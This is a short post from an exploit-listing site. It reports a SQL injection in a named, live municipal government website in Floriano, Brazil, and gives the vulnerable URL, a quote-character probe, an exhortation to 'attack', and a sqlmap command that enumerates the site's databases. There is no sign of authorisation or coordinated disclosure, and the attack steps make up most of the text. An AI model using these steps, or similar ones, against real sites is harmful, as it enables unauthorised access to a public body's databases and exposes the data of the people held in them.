Floriano - PI | SQL Injection

2021.04.11
us uromulou (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

hello friends, how are you? I'm here to show you a flaw that I found at the Floriano City Hall, in Piaui, Brazil. Hacker: uRomulou Website: https://www.floriano.pi.gov.br/ Vulnerability: SQL Injection Method GET concept proof 1 . go to the site with the vulnerability >> https://www.floriano.pi.gov.br/galeria.php?id=5%27 2 . will not return errors, as sql failures do not always return errors. 3. and attack! you can use tools like sqlmap or others. an example using sqlmap : sqlmap --random-agent --batch --url https://www.floriano.pi.gov.br/galeria.php?id=5 --dbs


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top